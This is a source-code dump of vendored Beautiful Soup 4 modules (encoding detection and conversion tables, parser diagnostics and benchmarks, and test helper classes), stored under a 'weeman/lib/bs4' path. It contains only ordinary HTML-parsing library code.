350 |         self.log = logging.getLogger(__name__)
351 |         self.detector = EncodingDetector(
352 |             markup, override_encodings, is_html, exclude_encodings)
353 | 
354 |         # Short-circuit if the data is in Unicode to begin with.
355 |         if isinstance(markup, unicode) or markup == '':
356 |             self.markup = markup
357 |             self.unicode_markup = unicode(markup)
358 |             self.original_encoding = None
359 |             return
360 | 
361 |         # The encoding detector may have stripped a byte-order mark.
362 |         # Use the stripped markup from this point on.
363 |         self.markup = self.detector.markup
364 | 
365 |         u = None
366 |         for encoding in self.detector.encodings:
367 |             markup = self.detector.markup
368 |             u = self._convert_from(encoding)
369 |             if u is not None:
370 |                 break
371 | 
372 |         if not u:
373 |             # None of the encodings worked. As an absolute last resort,
374 |             # try them again with character replacement.
375 | 
376 |             for encoding in self.detector.encodings:
377 |                 if encoding != "ascii":
378 |                     u = self._convert_from(encoding, "replace")
379 |                 if u is not None:
380 |                     self.log.warning(
381 |                             "Some characters could not be decoded, and were "
382 |                             "replaced with REPLACEMENT CHARACTER."
383 |                     )
384 |                     self.contains_replacement_characters = True
385 |                     break
386 | 
387 |         # If none of that worked, we could at this point force it to
388 |         # ASCII, but that would destroy so much data that I think
389 |         # giving up is better.
390 |         self.unicode_markup = u
391 |         if not u:
392 |             self.original_encoding = None
393 | 
394 |     def _sub_ms_char(self, match):
395 |         """Changes a MS smart quote character to an XML or HTML
396 |         entity, or an ASCII character."""
397 |         orig = match.group(1)
398 |         if self.smart_quotes_to == 'ascii':
399 |             sub = self.MS_CHARS_TO_ASCII.get(orig).encode()
400 |         else:
401 |             sub = self.MS_CHARS.get(orig)
402 |             if type(sub) == tuple:
403 |                 if self.smart_quotes_to == 'xml':
404 |                     sub = '&#x'.encode() + sub[1].encode() + ';'.encode()
405 |                 else:
406 |                     sub = '&'.encode() + sub[0].encode() + ';'.encode()
407 |             else:
408 |                 sub = sub.encode()
409 |         return sub
410 | 
411 |     def _convert_from(self, proposed, errors="strict"):
412 |         proposed = self.find_codec(proposed)
413 |         if not proposed or (proposed, errors) in self.tried_encodings:
414 |             return None
415 |         self.tried_encodings.append((proposed, errors))
416 |         markup = self.markup
417 |         # Convert smart quotes to HTML if coming from an encoding
418 |         # that might have them.
419 |         if (self.smart_quotes_to is not None
420 |             and proposed in self.ENCODINGS_WITH_SMART_QUOTES):
421 |             smart_quotes_re = b"([\x80-\x9f])"
422 |             smart_quotes_compiled = re.compile(smart_quotes_re)
423 |             markup = smart_quotes_compiled.sub(self._sub_ms_char, markup)
424 | 
425 |         try:
426 |             #print "Trying to convert document to %s (errors=%s)" % (
427 |             #    proposed, errors)
428 |             u = self._to_unicode(markup, proposed, errors)
429 |             self.markup = u
430 |             self.original_encoding = proposed
431 |         except Exception as e:
432 |             #print "That didn't work!"
433 |             #print e
434 |             return None
435 |         #print "Correct encoding: %s" % proposed
436 |         return self.markup
437 | 
438 |     def _to_unicode(self, data, encoding, errors="strict"):
439 |         '''Given a string and its encoding, decodes the string into Unicode.
440 |         %encoding is a string recognized by encodings.aliases'''
441 |         return unicode(data, encoding, errors)
442 | 
443 |     @property
444 |     def declared_html_encoding(self):
445 |         if not self.is_html:
446 |             return None
447 |         return self.detector.declared_encoding
448 | 
449 |     def find_codec(self, charset):
450 |         value = (self._codec(self.CHARSET_ALIASES.get(charset, charset))
451 |                or (charset and self._codec(charset.replace("-", "")))
452 |                or (charset and self._codec(charset.replace("-", "_")))
453 |                or (charset and charset.lower())
454 |                or charset
455 |                 )
456 |         if value:
457 |             return value.lower()
458 |         return None
459 | 
460 |     def _codec(self, charset):
461 |         if not charset:
462 |             return charset
463 |         codec = None
464 |         try:
465 |             codecs.lookup(charset)
466 |             codec = charset
467 |         except (LookupError, ValueError):
468 |             pass
469 |         return codec
470 | 
471 | 
472 |     # A partial mapping of ISO-Latin-1 to HTML entities/XML numeric entities.
473 |     MS_CHARS = {b'\x80': ('euro', '20AC'),
474 |                 b'\x81': ' ',
475 |                 b'\x82': ('sbquo', '201A'),
476 |                 b'\x83': ('fnof', '192'),
477 |                 b'\x84': ('bdquo', '201E'),
478 |                 b'\x85': ('hellip', '2026'),
479 |                 b'\x86': ('dagger', '2020'),
480 |                 b'\x87': ('Dagger', '2021'),
481 |                 b'\x88': ('circ', '2C6'),
482 |                 b'\x89': ('permil', '2030'),
483 |                 b'\x8A': ('Scaron', '160'),
484 |                 b'\x8B': ('lsaquo', '2039'),
485 |                 b'\x8C': ('OElig', '152'),
486 |                 b'\x8D': '?',
487 |                 b'\x8E': ('#x17D', '17D'),
488 |                 b'\x8F': '?',
489 |                 b'\x90': '?',
490 |                 b'\x91': ('lsquo', '2018'),
491 |                 b'\x92': ('rsquo', '2019'),
492 |                 b'\x93': ('ldquo', '201C'),
493 |                 b'\x94': ('rdquo', '201D'),
494 |                 b'\x95': ('bull', '2022'),
495 |                 b'\x96': ('ndash', '2013'),
496 |                 b'\x97': ('mdash', '2014'),
497 |                 b'\x98': ('tilde', '2DC'),
498 |                 b'\x99': ('trade', '2122'),
499 |                 b'\x9a': ('scaron', '161'),
500 |                 b'\x9b': ('rsaquo', '203A'),
501 |                 b'\x9c': ('oelig', '153'),
502 |                 b'\x9d': '?',
503 |                 b'\x9e': ('#x17E', '17E'),
504 |                 b'\x9f': ('Yuml', ''),}
505 | 
506 |     # A parochial partial mapping of ISO-Latin-1 to ASCII. Contains
507 |     # horrors like stripping diacritical marks to turn á into a, but also
508 |     # contains non-horrors like turning “ into ".
509 |     MS_CHARS_TO_ASCII = {
510 |         b'\x80' : 'EUR',
511 |         b'\x81' : ' ',
512 |         b'\x82' : ',',
513 |         b'\x83' : 'f',
514 |         b'\x84' : ',,',
515 |         b'\x85' : '...',
516 |         b'\x86' : '+',
517 |         b'\x87' : '++',
518 |         b'\x88' : '^',
519 |         b'\x89' : '%',
520 |         b'\x8a' : 'S',
521 |         b'\x8b' : '<',
522 |         b'\x8c' : 'OE',
523 |         b'\x8d' : '?',
524 |         b'\x8e' : 'Z',
525 |         b'\x8f' : '?',
526 |         b'\x90' : '?',
527 |         b'\x91' : "'",
528 |         b'\x92' : "'",
529 |         b'\x93' : '"',
530 |         b'\x94' : '"',
531 |         b'\x95' : '*',
532 |         b'\x96' : '-',
533 |         b'\x97' : '--',
534 |         b'\x98' : '~',
535 |         b'\x99' : '(TM)',
536 |         b'\x9a' : 's',
537 |         b'\x9b' : '>',
538 |         b'\x9c' : 'oe',
539 |         b'\x9d' : '?',
540 |         b'\x9e' : 'z',
541 |         b'\x9f' : 'Y',
542 |         b'\xa0' : ' ',
543 |         b'\xa1' : '!',
544 |         b'\xa2' : 'c',
545 |         b'\xa3' : 'GBP',
546 |         b'\xa4' : '$', #This approximation is especially parochial--this is the
547 |                        #generic currency symbol.
548 |         b'\xa5' : 'YEN',
549 |         b'\xa6' : '|',
550 |         b'\xa7' : 'S',
551 |         b'\xa8' : '..',
552 |         b'\xa9' : '',
553 |         b'\xaa' : '(th)',
554 |         b'\xab' : '<<',
555 |         b'\xac' : '!',
556 |         b'\xad' : ' ',
557 |         b'\xae' : '(R)',
558 |         b'\xaf' : '-',
559 |         b'\xb0' : 'o',
560 |         b'\xb1' : '+-',
561 |         b'\xb2' : '2',
562 |         b'\xb3' : '3',
563 |         b'\xb4' : ("'", 'acute'),
564 |         b'\xb5' : 'u',
565 |         b'\xb6' : 'P',
566 |         b'\xb7' : '*',
567 |         b'\xb8' : ',',
568 |         b'\xb9' : '1',
569 |         b'\xba' : '(th)',
570 |         b'\xbb' : '>>',
571 |         b'\xbc' : '1/4',
572 |         b'\xbd' : '1/2',
573 |         b'\xbe' : '3/4',
574 |         b'\xbf' : '?',
575 |         b'\xc0' : 'A',
576 |         b'\xc1' : 'A',
577 |         b'\xc2' : 'A',
578 |         b'\xc3' : 'A',
579 |         b'\xc4' : 'A',
580 |         b'\xc5' : 'A',
581 |         b'\xc6' : 'AE',
582 |         b'\xc7' : 'C',
583 |         b'\xc8' : 'E',
584 |         b'\xc9' : 'E',
585 |         b'\xca' : 'E',
586 |         b'\xcb' : 'E',
587 |         b'\xcc' : 'I',
588 |         b'\xcd' : 'I',
589 |         b'\xce' : 'I',
590 |         b'\xcf' : 'I',
591 |         b'\xd0' : 'D',
592 |         b'\xd1' : 'N',
593 |         b'\xd2' : 'O',
594 |         b'\xd3' : 'O',
595 |         b'\xd4' : 'O',
596 |         b'\xd5' : 'O',
597 |         b'\xd6' : 'O',
598 |         b'\xd7' : '*',
599 |         b'\xd8' : 'O',
600 |         b'\xd9' : 'U',
601 |         b'\xda' : 'U',
602 |         b'\xdb' : 'U',
603 |         b'\xdc' : 'U',
604 |         b'\xdd' : 'Y',
605 |         b'\xde' : 'b',
606 |         b'\xdf' : 'B',
607 |         b'\xe0' : 'a',
608 |         b'\xe1' : 'a',
609 |         b'\xe2' : 'a',
610 |         b'\xe3' : 'a',
611 |         b'\xe4' : 'a',
612 |         b'\xe5' : 'a',
613 |         b'\xe6' : 'ae',
614 |         b'\xe7' : 'c',
615 |         b'\xe8' : 'e',
616 |         b'\xe9' : 'e',
617 |         b'\xea' : 'e',
618 |         b'\xeb' : 'e',
619 |         b'\xec' : 'i',
620 |         b'\xed' : 'i',
621 |         b'\xee' : 'i',
622 |         b'\xef' : 'i',
623 |         b'\xf0' : 'o',
624 |         b'\xf1' : 'n',
625 |         b'\xf2' : 'o',
626 |         b'\xf3' : 'o',
627 |         b'\xf4' : 'o',
628 |         b'\xf5' : 'o',
629 |         b'\xf6' : 'o',
630 |         b'\xf7' : '/',
631 |         b'\xf8' : 'o',
632 |         b'\xf9' : 'u',
633 |         b'\xfa' : 'u',
634 |         b'\xfb' : 'u',
635 |         b'\xfc' : 'u',
636 |         b'\xfd' : 'y',
637 |         b'\xfe' : 'b',
638 |         b'\xff' : 'y',
639 |         }
640 | 
641 |     # A map used when removing rogue Windows-1252/ISO-8859-1
642 |     # characters in otherwise UTF-8 documents.
643 |     #
644 |     # Note that \x81, \x8d, \x8f, \x90, and \x9d are undefined in
645 |     # Windows-1252.
646 |     WINDOWS_1252_TO_UTF8 = {
647 |         0x80 : b'\xe2\x82\xac', # €
648 |         0x82 : b'\xe2\x80\x9a', # ‚
649 |         0x83 : b'\xc6\x92',     # ƒ
650 |         0x84 : b'\xe2\x80\x9e', # „
651 |         0x85 : b'\xe2\x80\xa6', # …
652 |         0x86 : b'\xe2\x80\xa0', # †
653 |         0x87 : b'\xe2\x80\xa1', # ‡
654 |         0x88 : b'\xcb\x86',     # ˆ
655 |         0x89 : b'\xe2\x80\xb0', # ‰
656 |         0x8a : b'\xc5\xa0',     # Š
657 |         0x8b : b'\xe2\x80\xb9', # ‹
658 |         0x8c : b'\xc5\x92',     # Œ
659 |         0x8e : b'\xc5\xbd',     # Ž
660 |         0x91 : b'\xe2\x80\x98', # ‘
661 |         0x92 : b'\xe2\x80\x99', # ’
662 |         0x93 : b'\xe2\x80\x9c', # “
663 |         0x94 : b'\xe2\x80\x9d', # ”
664 |         0x95 : b'\xe2\x80\xa2', # •
665 |         0x96 : b'\xe2\x80\x93', # –
666 |         0x97 : b'\xe2\x80\x94', # —
667 |         0x98 : b'\xcb\x9c',     # ˜
668 |         0x99 : b'\xe2\x84\xa2', # ™
669 |         0x9a : b'\xc5\xa1',     # š
670 |         0x9b : b'\xe2\x80\xba', # ›
671 |         0x9c : b'\xc5\x93',     # œ
672 |         0x9e : b'\xc5\xbe',     # ž
673 |         0x9f : b'\xc5\xb8',     # Ÿ
674 |         0xa0 : b'\xc2\xa0',     #  
675 |         0xa1 : b'\xc2\xa1',     # ¡
676 |         0xa2 : b'\xc2\xa2',     # ¢
677 |         0xa3 : b'\xc2\xa3',     # £
678 |         0xa4 : b'\xc2\xa4',     # ¤
679 |         0xa5 : b'\xc2\xa5',     # ¥
680 |         0xa6 : b'\xc2\xa6',     # ¦
681 |         0xa7 : b'\xc2\xa7',     # §
682 |         0xa8 : b'\xc2\xa8',     # ¨
683 |         0xa9 : b'\xc2\xa9',     # ©
684 |         0xaa : b'\xc2\xaa',     # ª
685 |         0xab : b'\xc2\xab',     # «
686 |         0xac : b'\xc2\xac',     # ¬
687 |         0xad : b'\xc2\xad',     # ­
688 |         0xae : b'\xc2\xae',     # ®
689 |         0xaf : b'\xc2\xaf',     # ¯
690 |         0xb0 : b'\xc2\xb0',     # °
691 |         0xb1 : b'\xc2\xb1',     # ±
692 |         0xb2 : b'\xc2\xb2',     # ²
693 |         0xb3 : b'\xc2\xb3',     # ³
694 |         0xb4 : b'\xc2\xb4',     # ´
695 |         0xb5 : b'\xc2\xb5',     # µ
696 |         0xb6 : b'\xc2\xb6',     # ¶
697 |         0xb7 : b'\xc2\xb7',     # ·
698 |         0xb8 : b'\xc2\xb8',     # ¸
699 |         0xb9 : b'\xc2\xb9',     # ¹
700 |         0xba : b'\xc2\xba',     # º
701 |         0xbb : b'\xc2\xbb',     # »
702 |         0xbc : b'\xc2\xbc',     # ¼
703 |         0xbd : b'\xc2\xbd',     # ½
704 |         0xbe : b'\xc2\xbe',     # ¾
705 |         0xbf : b'\xc2\xbf',     # ¿
706 |         0xc0 : b'\xc3\x80',     # À
707 |         0xc1 : b'\xc3\x81',     # Á
708 |         0xc2 : b'\xc3\x82',     # Â
709 |         0xc3 : b'\xc3\x83',     # Ã
710 |         0xc4 : b'\xc3\x84',     # Ä
711 |         0xc5 : b'\xc3\x85',     # Å
712 |         0xc6 : b'\xc3\x86',     # Æ
713 |         0xc7 : b'\xc3\x87',     # Ç
714 |         0xc8 : b'\xc3\x88',     # È
715 |         0xc9 : b'\xc3\x89',     # É
716 |         0xca : b'\xc3\x8a',     # Ê
717 |         0xcb : b'\xc3\x8b',     # Ë
718 |         0xcc : b'\xc3\x8c',     # Ì
719 |         0xcd : b'\xc3\x8d',     # Í
720 |         0xce : b'\xc3\x8e',     # Î
721 |         0xcf : b'\xc3\x8f',     # Ï
722 |         0xd0 : b'\xc3\x90',     # Ð
723 |         0xd1 : b'\xc3\x91',     # Ñ
724 |         0xd2 : b'\xc3\x92',     # Ò
725 |         0xd3 : b'\xc3\x93',     # Ó
726 |         0xd4 : b'\xc3\x94',     # Ô
727 |         0xd5 : b'\xc3\x95',     # Õ
728 |         0xd6 : b'\xc3\x96',     # Ö
729 |         0xd7 : b'\xc3\x97',     # ×
730 |         0xd8 : b'\xc3\x98',     # Ø
731 |         0xd9 : b'\xc3\x99',     # Ù
732 |         0xda : b'\xc3\x9a',     # Ú
733 |         0xdb : b'\xc3\x9b',     # Û
734 |         0xdc : b'\xc3\x9c',     # Ü
735 |         0xdd : b'\xc3\x9d',     # Ý
736 |         0xde : b'\xc3\x9e',     # Þ
737 |         0xdf : b'\xc3\x9f',     # ß
738 |         0xe0 : b'\xc3\xa0',     # à
739 |         0xe1 : b'\xa1',     # á
740 |         0xe2 : b'\xc3\xa2',     # â
741 |         0xe3 : b'\xc3\xa3',     # ã
742 |         0xe4 : b'\xc3\xa4',     # ä
743 |         0xe5 : b'\xc3\xa5',     # å
744 |         0xe6 : b'\xc3\xa6',     # æ
745 |         0xe7 : b'\xc3\xa7',     # ç
746 |         0xe8 : b'\xc3\xa8',     # è
747 |         0xe9 : b'\xc3\xa9',     # é
748 |         0xea : b'\xc3\xaa',     # ê
749 |         0xeb : b'\xc3\xab',     # ë
750 |         0xec : b'\xc3\xac',     # ì
751 |         0xed : b'\xc3\xad',     # í
752 |         0xee : b'\xc3\xae',     # î
753 |         0xef : b'\xc3\xaf',     # ï
754 |         0xf0 : b'\xc3\xb0',     # ð
755 |         0xf1 : b'\xc3\xb1',     # ñ
756 |         0xf2 : b'\xc3\xb2',     # ò
757 |         0xf3 : b'\xc3\xb3',     # ó
758 |         0xf4 : b'\xc3\xb4',     # ô
759 |         0xf5 : b'\xc3\xb5',     # õ
760 |         0xf6 : b'\xc3\xb6',     # ö
761 |         0xf7 : b'\xc3\xb7',     # ÷
762 |         0xf8 : b'\xc3\xb8',     # ø
763 |         0xf9 : b'\xc3\xb9',     # ù
764 |         0xfa : b'\xc3\xba',     # ú
765 |         0xfb : b'\xc3\xbb',     # û
766 |         0xfc : b'\xc3\xbc',     # ü
767 |         0xfd : b'\xc3\xbd',     # ý
768 |         0xfe : b'\xc3\xbe',     # þ
769 |         }
770 | 
771 |     MULTIBYTE_MARKERS_AND_SIZES = [
772 |         (0xc2, 0xdf, 2), # 2-byte characters start with a byte C2-DF
773 |         (0xe0, 0xef, 3), # 3-byte characters start with E0-EF
774 |         (0xf0, 0xf4, 4), # 4-byte characters start with F0-F4
775 |         ]
776 | 
777 |     FIRST_MULTIBYTE_MARKER = MULTIBYTE_MARKERS_AND_SIZES[0][0]
778 |     LAST_MULTIBYTE_MARKER = MULTIBYTE_MARKERS_AND_SIZES[-1][1]
779 | 
780 |     @classmethod
781 |     def detwingle(cls, in_bytes, main_encoding="utf8",
782 |                   embedded_encoding="windows-1252"):
783 |         """Fix characters from one encoding embedded in some other encoding.
784 | 
785 |         Currently the only situation supported is Windows-1252 (or its
786 |         subset ISO-8859-1), embedded in UTF-8.
787 | 
788 |         The input must be a bytestring. If you've already converted
789 |         the document to Unicode, you're too late.
790 | 
791 |         The output is a bytestring in which `embedded_encoding`
792 |         characters have been converted to their `main_encoding`
793 |         equivalents.
794 |         """
795 |         if embedded_encoding.replace('_', '-').lower() not in (
796 |             'windows-1252', 'windows_1252'):
797 |             raise NotImplementedError(
798 |                 "Windows-1252 and ISO-8859-1 are the only currently supported "
799 |                 "embedded encodings.")
800 | 
801 |         if main_encoding.lower() not in ('utf8', 'utf-8'):
802 |             raise NotImplementedError(
803 |                 "UTF-8 is the only currently supported main encoding.")
804 | 
805 |         byte_chunks = []
806 | 
807 |         chunk_start = 0
808 |         pos = 0
809 |         while pos < len(in_bytes):
810 |             byte = in_bytes[pos]
811 |             if not isinstance(byte, int):
812 |                 # Python 2.x
813 |                 byte = ord(byte)
814 |             if (byte >= cls.FIRST_MULTIBYTE_MARKER
815 |                 and byte <= cls.LAST_MULTIBYTE_MARKER):
816 |                 # This is the start of a UTF-8 multibyte character. Skip
817 |                 # to the end.
818 |                 for start, end, size in cls.MULTIBYTE_MARKERS_AND_SIZES:
819 |                     if byte >= start and byte <= end:
820 |                         pos += size
821 |                         break
822 |             elif byte >= 0x80 and byte in cls.WINDOWS_1252_TO_UTF8:
823 |                 # We found a Windows-1252 character!
824 |                 # Save the string up to this point as a chunk.
825 |                 byte_chunks.append(in_bytes[chunk_start:pos])
826 | 
827 |                 # Now translate the Windows-1252 character into UTF-8
828 |                 # and add it as another, one-byte chunk.
829 |                 byte_chunks.append(cls.WINDOWS_1252_TO_UTF8[byte])
830 |                 pos += 1
831 |                 chunk_start = pos
832 |             else:
833 |                 # Go on to the next character.
834 |                 pos += 1
835 |         if chunk_start == 0:
836 |             # The string is unchanged.
837 |             return in_bytes
838 |         else:
839 |             # Store the final chunk.
840 |             byte_chunks.append(in_bytes[chunk_start:])
841 |         return b''.join(byte_chunks)
842 | 
843 | 


--------------------------------------------------------------------------------
/weeman/lib/bs4/diagnose.py:
--------------------------------------------------------------------------------
  1 | """Diagnostic functions, mainly for use when doing tech support."""
  2 | 
  3 | # Use of this source code is governed by a BSD-style license that can be
  4 | # found in the LICENSE file.
  5 | __license__ = "MIT"
  6 | 
  7 | import cProfile
  8 | from StringIO import StringIO
  9 | from HTMLParser import HTMLParser
 10 | import lib.bs4
 11 | from lib.bs4 import BeautifulSoup, __version__
 12 | from lib.bs4.builder import builder_registry
 13 | 
 14 | import os
 15 | import pstats
 16 | import random
 17 | import tempfile
 18 | import time
 19 | import traceback
 20 | import sys
 21 | import cProfile
 22 | 
 23 | def diagnose(data):
 24 |     """Diagnostic suite for isolating common problems."""
 25 |     print "Diagnostic running on Beautiful Soup %s" % __version__
 26 |     print "Python version %s" % sys.version
 27 | 
 28 |     basic_parsers = ["html.parser", "html5lib", "lxml"]
 29 |     for name in basic_parsers:
 30 |         for builder in builder_registry.builders:
 31 |             if name in builder.features:
 32 |                 break
 33 |         else:
 34 |             basic_parsers.remove(name)
 35 |             print (
 36 |                 "I noticed that %s is not installed. Installing it may help." %
 37 |                 name)
 38 | 
 39 |     if 'lxml' in basic_parsers:
 40 |         basic_parsers.append(["lxml", "xml"])
 41 |         try:
 42 |             from lxml import etree
 43 |             print "Found lxml version %s" % ".".join(map(str,etree.LXML_VERSION))
 44 |         except ImportError, e:
 45 |             print (
 46 |                 "lxml is not installed or couldn't be imported.")
 47 | 
 48 | 
 49 |     if 'html5lib' in basic_parsers:
 50 |         try:
 51 |             import html5lib
 52 |             print "Found html5lib version %s" % html5lib.__version__
 53 |         except ImportError, e:
 54 |             print (
 55 |                 "html5lib is not installed or couldn't be imported.")
 56 | 
 57 |     if hasattr(data, 'read'):
 58 |         data = data.read()
 59 |     elif os.path.exists(data):
 60 |         print '"%s" looks like a filename. Reading data from the file.' % data
 61 |         with open(data) as fp:
 62 |             data = fp.read()
 63 |     elif data.startswith("http:") or data.startswith("https:"):
 64 |         print '"%s" looks like a URL. Beautiful Soup is not an HTTP client.' % data
 65 |         print "You need to use some other library to get the document behind the URL, and feed that document to Beautiful Soup."
 66 |         return
 67 |     print
 68 | 
 69 |     for parser in basic_parsers:
 70 |         print "Trying to parse your markup with %s" % parser
 71 |         success = False
 72 |         try:
 73 |             soup = BeautifulSoup(data, parser)
 74 |             success = True
 75 |         except Exception, e:
 76 |             print "%s could not parse the markup." % parser
 77 |             traceback.print_exc()
 78 |         if success:
 79 |             print "Here's what %s did with the markup:" % parser
 80 |             print soup.prettify()
 81 | 
 82 |         print "-" * 80
 83 | 
 84 | def lxml_trace(data, html=True, **kwargs):
 85 |     """Print out the lxml events that occur during parsing.
 86 | 
 87 |     This lets you see how lxml parses a document when no Beautiful
 88 |     Soup code is running.
 89 |     """
 90 |     from lxml import etree
 91 |     for event, element in etree.iterparse(StringIO(data), html=html, **kwargs):
 92 |         print("%s, %4s, %s" % (event, element.tag, element.text))
 93 | 
 94 | class AnnouncingParser(HTMLParser):
 95 |     """Announces HTMLParser parse events, without doing anything else."""
 96 | 
 97 |     def _p(self, s):
 98 |         print(s)
 99 | 
100 |     def handle_starttag(self, name, attrs):
101 |         self._p("%s START" % name)
102 | 
103 |     def handle_endtag(self, name):
104 |         self._p("%s END" % name)
105 | 
106 |     def handle_data(self, data):
107 |         self._p("%s DATA" % data)
108 | 
109 |     def handle_charref(self, name):
110 |         self._p("%s CHARREF" % name)
111 | 
112 |     def handle_entityref(self, name):
113 |         self._p("%s ENTITYREF" % name)
114 | 
115 |     def handle_comment(self, data):
116 |         self._p("%s COMMENT" % data)
117 | 
118 |     def handle_decl(self, data):
119 |         self._p("%s DECL" % data)
120 | 
121 |     def unknown_decl(self, data):
122 |         self._p("%s UNKNOWN-DECL" % data)
123 | 
124 |     def handle_pi(self, data):
125 |         self._p("%s PI" % data)
126 | 
127 | def htmlparser_trace(data):
128 |     """Print out the HTMLParser events that occur during parsing.
129 | 
130 |     This lets you see how HTMLParser parses a document when no
131 |     Beautiful Soup code is running.
132 |     """
133 |     parser = AnnouncingParser()
134 |     parser.feed(data)
135 | 
136 | _vowels = "aeiou"
137 | _consonants = "bcdfghjklmnpqrstvwxyz"
138 | 
139 | def rword(length=5):
140 |     "Generate a random word-like string."
141 |     s = ''
142 |     for i in range(length):
143 |         if i % 2 == 0:
144 |             t = _consonants
145 |         else:
146 |             t = _vowels
147 |         s += random.choice(t)
148 |     return s
149 | 
150 | def rsentence(length=4):
151 |     "Generate a random sentence-like string."
152 |     return " ".join(rword(random.randint(4,9)) for i in range(length))
153 |         
154 | def rdoc(num_elements=1000):
155 |     """Randomly generate an invalid HTML document."""
156 |     tag_names = ['p', 'div', 'span', 'i', 'b', 'script', 'table']
157 |     elements = []
158 |     for i in range(num_elements):
159 |         choice = random.randint(0,3)
160 |         if choice == 0:
161 |             # New tag.
162 |             tag_name = random.choice(tag_names)
163 |             elements.append("<%s>" % tag_name)
164 |         elif choice == 1:
165 |             elements.append(rsentence(random.randint(1,4)))
166 |         elif choice == 2:
167 |             # Close a tag.
168 |             tag_name = random.choice(tag_names)
169 |             elements.append("</%s>" % tag_name)
170 |     return "<html>" + "\n".join(elements) + "</html>"
171 | 
172 | def benchmark_parsers(num_elements=100000):
173 |     """Very basic head-to-head performance benchmark."""
174 |     print "Comparative parser benchmark on Beautiful Soup %s" % __version__
175 |     data = rdoc(num_elements)
176 |     print "Generated a large invalid HTML document (%d bytes)." % len(data)
177 |     
178 |     for parser in ["lxml", ["lxml", "html"], "html5lib", "html.parser"]:
179 |         success = False
180 |         try:
181 |             a = time.time()
182 |             soup = BeautifulSoup(data, parser)
183 |             b = time.time()
184 |             success = True
185 |         except Exception, e:
186 |             print "%s could not parse the markup." % parser
187 |             traceback.print_exc()
188 |         if success:
189 |             print "BS4+%s parsed the markup in %.2fs." % (parser, b-a)
190 | 
191 |     from lxml import etree
192 |     a = time.time()
193 |     etree.HTML(data)
194 |     b = time.time()
195 |     print "Raw lxml parsed the markup in %.2fs." % (b-a)
196 | 
197 |     import html5lib
198 |     parser = html5lib.HTMLParser()
199 |     a = time.time()
200 |     parser.parse(data)
201 |     b = time.time()
202 |     print "Raw html5lib parsed the markup in %.2fs." % (b-a)
203 | 
204 | def profile(num_elements=100000, parser="lxml"):
205 | 
206 |     filehandle = tempfile.NamedTemporaryFile()
207 |     filename = filehandle.name
208 | 
209 |     data = rdoc(num_elements)
210 |     vars = dict(bs4=bs4, data=data, parser=parser)
211 |     cProfile.runctx('bs4.BeautifulSoup(data, parser)' , vars, vars, filename)
212 | 
213 |     stats = pstats.Stats(filename)
214 |     # stats.strip_dirs()
215 |     stats.sort_stats("cumulative")
216 |     stats.print_stats('_html5lib|bs4', 50)
217 | 
218 | if __name__ == '__main__':
219 |     diagnose(sys.stdin.read())
220 | 


--------------------------------------------------------------------------------
/weeman/lib/bs4/testing.py:
--------------------------------------------------------------------------------
  1 | """Helper classes for tests."""
  2 | 
  3 | # Use of this source code is governed by a BSD-style license that can be
  4 | # found in the LICENSE file.
  5 | __license__ = "MIT"
  6 | 
  7 | import pickle
  8 | import copy
  9 | import functools
 10 | import unittest
 11 | from unittest import TestCase
 12 | from lib.bs4 import BeautifulSoup
 13 | from lib.bs4.element import (
 14 |     CharsetMetaAttributeValue,
 15 |     Comment,
 16 |     ContentMetaAttributeValue,
 17 |     Doctype,
 18 |     SoupStrainer,
 19 | )
 20 | 
 21 | from bs4.builder import HTMLParserTreeBuilder
 22 | default_builder = HTMLParserTreeBuilder
 23 | 
 24 | 
 25 | class SoupTest(unittest.TestCase):
 26 | 
 27 |     @property
 28 |     def default_builder(self):
 29 |         return default_builder()
 30 | 
 31 |     def soup(self, markup, **kwargs):
 32 |         """Build a Beautiful Soup object from markup."""
 33 |         builder = kwargs.pop('builder', self.default_builder)
 34 |         return BeautifulSoup(markup, builder=builder, **kwargs)
 35 | 
 36 |     def document_for(self, markup):
 37 |         """Turn an HTML fragment into a document.
 38 | 
 39 |         The details depend on the builder.
 40 |         """
 41 |         return self.default_builder.test_fragment_to_document(markup)
 42 | 
 43 |     def assertSoupEquals(self, to_parse, compare_parsed_to=None):
 44 |         builder = self.default_builder
 45 |         obj = BeautifulSoup(to_parse, builder=builder)
 46 |         if compare_parsed_to is None:
 47 |             compare_parsed_to = to_parse
 48 | 
 49 |         self.assertEqual(obj.decode(), self.document_for(compare_parsed_to))
 50 | 
 51 |     def assertConnectedness(self, element):
 52 |         """Ensure that next_element and previous_element are properly
 53 |         set for all descendants of the given element.
 54 |         """
 55 |         earlier = None
 56 |         for e in element.descendants:
 57 |             if earlier:
 58 |                 self.assertEqual(e, earlier.next_element)
 59 |                 self.assertEqual(earlier, e.previous_element)
 60 |             earlier = e
 61 | 
 62 | class HTMLTreeBuilderSmokeTest(object):
 63 | 
 64 |     """A basic test of a treebuilder's competence.
 65 | 
 66 |     Any HTML treebuilder, present or future, should be able to pass
 67 |     these tests. With invalid markup, there's room for interpretation,
 68 |     and different parsers can handle it differently. But with the
 69 |     markup in these tests, there's not much room for interpretation.
 70 |     """
 71 | 
 72 |     def test_pickle_and_unpickle_identity(self):
 73 |         # Pickling a tree, then unpickling it, yields a tree identical
 74 |         # to the original.
 75 |         tree = self.soup("<a><b>foo</a>")
 76 |         dumped = pickle.dumps(tree, 2)
 77 |         loaded = pickle.loads(dumped)
 78 |         self.assertEqual(loaded.__class__, BeautifulSoup)
 79 |         self.assertEqual(loaded.decode(), tree.decode())
 80 | 
 81 |     def assertDoctypeHandled(self, doctype_fragment):
 82 |         """Assert that a given doctype string is handled correctly."""
 83 |         doctype_str, soup = self._document_with_doctype(doctype_fragment)
 84 | 
 85 |         # Make sure a Doctype object was created.
 86 |         doctype = soup.contents[0]
 87 |         self.assertEqual(doctype.__class__, Doctype)
 88 |         self.assertEqual(doctype, doctype_fragment)
 89 |         self.assertEqual(str(soup)[:len(doctype_str)], doctype_str)
 90 | 
 91 |         # Make sure that the doctype was correctly associated with the
 92 |         # parse tree and that the rest of the document parsed.
 93 |         self.assertEqual(soup.p.contents[0], 'foo')
 94 | 
 95 |     def _document_with_doctype(self, doctype_fragment):
 96 |         """Generate and parse a document with the given doctype."""
 97 |         doctype = '<!DOCTYPE %s>' % doctype_fragment
 98 |         markup = doctype + '\n<p>foo</p>'
 99 |         soup = self.soup(markup)
100 |         return doctype, soup
101 | 
102 |     def test_normal_doctypes(self):
103 |         """Make sure normal, everyday HTML doctypes are handled correctly."""
104 |         self.assertDoctypeHandled("html")
105 |         self.assertDoctypeHandled(
106 |             'html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"')
107 | 
108 |     def test_empty_doctype(self):
109 |         soup = self.soup("<!DOCTYPE>")
